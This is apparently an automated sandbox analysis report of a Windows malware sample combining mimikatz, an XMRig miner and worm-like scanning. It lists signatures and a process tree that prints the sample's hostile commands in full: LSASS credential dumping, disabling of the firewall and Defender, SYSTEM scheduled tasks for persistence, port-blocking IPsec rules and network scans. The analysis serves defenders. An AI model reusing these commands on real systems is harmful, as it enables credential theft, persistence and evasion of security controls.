Overview

overview

10

Static

static

10

2024-08-11...tz.exe

windows7-x64

10

2024-08-11...tz.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-08-2024 06:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-08-11_90fa023b03c07aa73ff1e6ed591d76eb_hacktools_icedid_mimikatz.exe

  • Size

    8.5MB

  • MD5

    90fa023b03c07aa73ff1e6ed591d76eb

  • SHA1

    b07802c29b853d4b44bcc3cca455ce67e8433a0f

  • SHA256

    c0f25d2d4583043448e8374ce672fda26dd7d0cd5509f43a9dc9c0a4827250c7

  • SHA512

    808c37ad2b5c09126ed26ce1f0afe28c281eccc1798525cd665e14ff06ceae7e8a343aa7f0ed7673c770fd228a408257909a3d334e484829c4c58d1bd5236cf0

  • SSDEEP

    98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr

Score
10/10
mimikatzxmrigcredential_accessdiscoveryevasionexecutionminerpersistenceprivilege_escalationupx

Malware Config

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

    mimikatz
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Contacts a large (30290) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

    credential_access
  • XMRig Miner payload 12 IoCs
    miner
  • mimikatz is an open source tool to dump credentials on Windows 6 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
    persistence
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 37 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Creates a Windows Service
    persistence
  • Drops file in System32 directory 18 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • NSIS installer 3 IoCs
    installer
  • Modifies data under HKEY_USERS 45 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1388
      • C:\Windows\TEMP\tzgyhthhu\pctkcm.exe
        "C:\Windows\TEMP\tzgyhthhu\pctkcm.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4580
    • C:\Users\Admin\AppData\Local\Temp\2024-08-11_90fa023b03c07aa73ff1e6ed591d76eb_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-08-11_90fa023b03c07aa73ff1e6ed591d76eb_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1760
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\gezmcuhh\euiugba.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:1820
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4700
        • C:\Windows\gezmcuhh\euiugba.exe
          C:\Windows\gezmcuhh\euiugba.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:436
    • C:\Windows\gezmcuhh\euiugba.exe
      C:\Windows\gezmcuhh\euiugba.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2456
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3376
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:452
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3852
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2192
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
            • System Location Discovery: System Language Discovery
            PID:808
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4020
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4812
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static del all
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:2168
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=Bastards description=FuckingBastards
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:4212
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add filteraction name=BastardsList action=block
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:952
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Windows\thgpqiiyn\zymuetvrm\wpcap.exe /S
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2428
          • C:\Windows\thgpqiiyn\zymuetvrm\wpcap.exe
            C:\Windows\thgpqiiyn\zymuetvrm\wpcap.exe /S
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3448
            • C:\Windows\SysWOW64\net.exe
              net stop "Boundary Meter"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2116
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "Boundary Meter"
                5⤵
                  PID:2032
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1852
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1480
              • C:\Windows\SysWOW64\net.exe
                net stop npf
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:804
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4376
              • C:\Windows\SysWOW64\net.exe
                net start npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:1868
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4428
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c net start npf
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2504
            • C:\Windows\SysWOW64\net.exe
              net start npf
              3⤵
                PID:2660
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:3136
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
              • System Location Discovery: System Language Discovery
              PID:4204
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                  PID:2216
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:1908
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\thgpqiiyn\zymuetvrm\glithlcwh.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\thgpqiiyn\zymuetvrm\Scant.txt
                2⤵
                • System Location Discovery: System Language Discovery
                PID:4268
                • C:\Windows\thgpqiiyn\zymuetvrm\glithlcwh.exe
                  C:\Windows\thgpqiiyn\zymuetvrm\glithlcwh.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\thgpqiiyn\zymuetvrm\Scant.txt
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:1136
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\thgpqiiyn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\thgpqiiyn\Corporate\log.txt
                2⤵
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:1176
                • C:\Windows\thgpqiiyn\Corporate\vfshost.exe
                  C:\Windows\thgpqiiyn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1560
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "pazzgwtck" /ru system /tr "cmd /c C:\Windows\ime\euiugba.exe"
                2⤵
                  PID:1188
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:5116
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "pazzgwtck" /ru system /tr "cmd /c C:\Windows\ime\euiugba.exe"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3088
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "uzmeguupv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gezmcuhh\euiugba.exe /p everyone:F"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:1592
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4372
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "uzmeguupv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gezmcuhh\euiugba.exe /p everyone:F"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:1008
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ruzpterzk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tzgyhthhu\pctkcm.exe /p everyone:F"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:8
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                      PID:4332
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "ruzpterzk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tzgyhthhu\pctkcm.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:4932
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:3232
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:4024
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3416
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:804
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3476
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1868
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4580
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3548
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:3580
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:2216
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:452
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1088
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop SharedAccess
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1308
                    • C:\Windows\SysWOW64\net.exe
                      net stop SharedAccess
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4708
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop SharedAccess
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:3132
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh firewall set opmode mode=disable
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4564
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh firewall set opmode mode=disable
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:864
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh Advfirewall set allprofiles state off
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3304
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh Advfirewall set allprofiles state off
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:3860
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop MpsSvc
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3648
                    • C:\Windows\SysWOW64\net.exe
                      net stop MpsSvc
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1880
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop MpsSvc
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:4400
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop WinDefend
                    2⤵
                      PID:4372
                      • C:\Windows\SysWOW64\net.exe
                        net stop WinDefend
                        3⤵
                          PID:628
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop WinDefend
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:2108
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop wuauserv
                        2⤵
                          PID:3892
                          • C:\Windows\SysWOW64\net.exe
                            net stop wuauserv
                            3⤵
                              PID:232
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop wuauserv
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:2756
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config MpsSvc start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:5116
                            • C:\Windows\SysWOW64\sc.exe
                              sc config MpsSvc start= disabled
                              3⤵
                              • Launches sc.exe
                              PID:3444
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config SharedAccess start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:1948
                            • C:\Windows\SysWOW64\sc.exe
                              sc config SharedAccess start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:3196
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config WinDefend start= disabled
                            2⤵
                              PID:4048
                              • C:\Windows\SysWOW64\sc.exe
                                sc config WinDefend start= disabled
                                3⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:5012
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c sc config wuauserv start= disabled
                              2⤵
                                PID:1000
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config wuauserv start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:3800
                              • C:\Windows\TEMP\xohudmc.exe
                                C:\Windows\TEMP\xohudmc.exe
                                2⤵
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of SetWindowsHookEx
                                PID:3068
                              • C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
                                C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 784 C:\Windows\TEMP\thgpqiiyn\784.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4748
                              • C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
                                C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 336 C:\Windows\TEMP\thgpqiiyn\336.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2696
                              • C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
                                C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 1388 C:\Windows\TEMP\thgpqiiyn\1388.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:468
                              • C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
                                C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 2528 C:\Windows\TEMP\thgpqiiyn\2528.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1612
                              • C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
                                C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 2876 C:\Windows\TEMP\thgpqiiyn\2876.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2032
                              • C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
                                C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 2972 C:\Windows\TEMP\thgpqiiyn\2972.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4120
                              • C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
                                C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 2964 C:\Windows\TEMP\thgpqiiyn\2964.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3648
                              • C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
                                C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 3768 C:\Windows\TEMP\thgpqiiyn\3768.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:952
                              • C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
                                C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 3924 C:\Windows\TEMP\thgpqiiyn\3924.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4636
                              • C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
                                C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 3988 C:\Windows\TEMP\thgpqiiyn\3988.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2216
                              • C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
                                C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 4068 C:\Windows\TEMP\thgpqiiyn\4068.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4020
                              • C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
                                C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 1244 C:\Windows\TEMP\thgpqiiyn\1244.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1508
                              • C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
                                C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 3140 C:\Windows\TEMP\thgpqiiyn\3140.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1880
                              • C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
                                C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 2628 C:\Windows\TEMP\thgpqiiyn\2628.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5116
                              • C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
                                C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 5028 C:\Windows\TEMP\thgpqiiyn\5028.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4216
                              • C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
                                C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 3156 C:\Windows\TEMP\thgpqiiyn\3156.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2680
                              • C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
                                C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 968 C:\Windows\TEMP\thgpqiiyn\968.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4392
                              • C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
                                C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 3224 C:\Windows\TEMP\thgpqiiyn\3224.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2688
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c C:\Windows\thgpqiiyn\zymuetvrm\scan.bat
                                2⤵
                                  PID:3160
                                  • C:\Windows\thgpqiiyn\zymuetvrm\eguiemhzp.exe
                                    eguiemhzp.exe TCP 194.110.0.1 194.110.255.255 7001 512 /save
                                    3⤵
                                    • Executes dropped EXE
                                    • Drops file in Windows directory
                                    • System Location Discovery: System Language Discovery
                                    PID:3168
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                  2⤵
                                    PID:5908
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:456
                                    • C:\Windows\SysWOW64\cacls.exe
                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2176
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2776
                                    • C:\Windows\SysWOW64\cacls.exe
                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:5904
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      3⤵
                                        PID:3212
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3840
                                  • C:\Windows\SysWOW64\jobnkm.exe
                                    C:\Windows\SysWOW64\jobnkm.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of SetWindowsHookEx
                                    PID:4500
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c C:\Windows\ime\euiugba.exe
                                    1⤵
                                      PID:2916
                                      • C:\Windows\ime\euiugba.exe
                                        C:\Windows\ime\euiugba.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        PID:2256
                                    • C:\Windows\system32\cmd.EXE
                                      C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gezmcuhh\euiugba.exe /p everyone:F
                                      1⤵
                                        PID:4968
